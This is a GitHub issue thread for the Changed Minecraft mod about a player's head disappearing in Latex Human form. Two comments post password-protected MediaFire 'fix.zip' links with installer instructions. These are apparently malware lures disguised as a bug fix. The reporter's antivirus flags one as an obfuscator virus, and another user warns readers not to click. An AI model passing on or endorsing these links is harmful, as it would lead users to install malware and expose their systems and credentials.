### ISSUE TITLE
Head Disappeared in Latex Human Form

### ISSUE THREAD

**Issue by XiaoTDM** [LtxProgrammer/Changed-Minecraft-Mod#1016]
Version: 0.13.1

When Transfured to Latex Human, player's (and mob's) head disappeared, as it shown in pic. The following are suspicious mods:
  Skin Layers 3D; First Person Model; Leawind Third Person; Freecam; Tweakerge (Tweakeroo Forge Port, Freecam module)
There seems to be no way to fix without disabling these mods.
![image](https://github.com/user-attachments/assets/3ab54b3d-1a34-40ac-a8af-0dc465eb4471)

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by XiaoTDM** [comment]
> 下载 https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

My antivirus software detected virus: HVM:VirTool/Obfuscator.gen!B
How does it works?

**Comment by zengxiaofei** [comment]
It's totally a virus dude. Don't click that URL.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LtxProgrammer** [comment]
Presumed duplicate of #1014
